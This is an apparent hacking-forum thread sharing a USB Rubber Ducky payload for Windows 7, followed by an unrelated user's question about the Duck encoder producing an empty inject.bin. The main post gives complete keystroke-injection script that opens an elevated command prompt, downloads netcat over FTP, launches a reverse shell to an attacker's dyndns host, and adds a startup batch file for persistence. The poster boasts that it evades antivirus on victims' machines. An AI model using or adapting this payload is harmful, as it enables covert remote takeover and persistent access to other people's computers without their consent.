[[Payload] Strictly Nc Reverse Shell]

Let me know what you think guys. I know this one may be annoying because of the FTP server aspect of it. But if you end up trying it I assure you, you won't be disappointed. If I find any anonymous servers with anonymous upload on I will be sure to post them.

[[Payload] Strictly Nc Reverse Shell]

Disregard this post

[[Payload] Strictly Nc Reverse Shell]

My Strictly Netcat Reverse Shell

Ok this has a few requirements so it is not that user friendly but I like this method because after a few tests it has not been detected by any AV or other types of security programs.

Works on Windows 7

The first requirement is an FTP server. All windows boxes include an ftp client by default thats what I will be using to download the nc.exe and startup script .bat file. If Windows had a wget program we would not even need an FTP server. An anonymous server with upload and download turned on would be great for this but good luck finding one. So you will probably have to run an FTP server yourself like I have done.

So once you have an ftp server up and running download the windows version of netcat, unzip it and put the files into a directory called /tools/nc in the user your logging in with's root directory (you can always change my code so your ducky script will look in your specific directory you want it to for the nc files).

Download the windows version of netcat here http://www.downloadnetcat.com/. Scroll down and select download netcat windows version.

Now make a .bat file and add one line to it:

start nc yourserver.dyndns.org 8080 -d -e cmd.exe

Add that bat file to the same directory your netcat files are in. In my case /tools/nc

Now on your attacking computer you must listen for the incoming connection with this command:

nc -l -p 8080

Also remember to port forward port 8080 on your router to your internal listening attack computer!

Now that you have everything set up you are ready to put the ducky into a victims computer anywhere in the world. The only thing that can stop this is if the victims network fro some reason blocks 8080 inc or outgoing. In that case just change the port number. Ive tested this on a few Windows 7 systems and it went undetected on all of them. Each one had anti virus such as Mcafee and Norton. Firewalls on as well.

 ESCAPE
CONTROL ESCAPE
DELAY 900
STRING cmd
DELAY 900
MENU
DELAY 900
STRING a
DELAY 900
ENTER
DELAY 1800
LEFTARROW
DELAY 900
ENTER
DELAY 900
STRING ftp
ENTER
DELAY 600
STRING open yourftpservernamehere.dyndns.org
ENTER
DELAY 900
STRING FtpUsernameHere
ENTER
DELAY 900
STRING YourFtpServersUsernamesPasswdHere
DELAY 500
ENTER
DELAY 1000
STRING cd tools
ENTER
DELAY 900
STRING cd nc
DELAY 900
ENTER
STRING mget *
DELAY 800
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 500
ENTER
STRING quit
ENTER
DELAY 400
STRING start nc yourlisteningsevernamehere.dyndns.org 8080 -d -e cmd.exe
ENTER
DELAY 400
STRING exit
ENTER

Now once your inside the victims computer issue the command:

move batfileyoumade.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Now there computer will run your netcat reverse shell whenever it boots.

You may have noticed I have some long delays. I have long delays because I tested on fast and SLOW computers which required the longer delays to work. You may also notice the "start" before the actual nc reverse shell command. This is the equivalent to the & in Linux to run a command in the background. Doing this enables us to exit out of the command prompt leaving less traces of the backdoor. So the only way the victim will see the backdoor is if they check things like task manager .

[[Encoder] Duckencode.jar Ubuntu]

I'm just going to post here rather than make a whole new thread. Just tell me off if I'm derailing your thread. Anyways..

I got my duck today and I've been trying to get my payloads to work all night. When I plug the duck in my Win7 it sees it fine and installs drivers fine although my payloads don't run. Not even the simple bart simpson payload.

After I run my java command java -jar /duckencode.jar -i reverse.txt -o /media/0007-545F/inject.bin

I ran cat on my inject.bin file and there was no data in it. No unintelligible binary code or anything in sight. So I think my inject.bin file is not being created or something. Please help.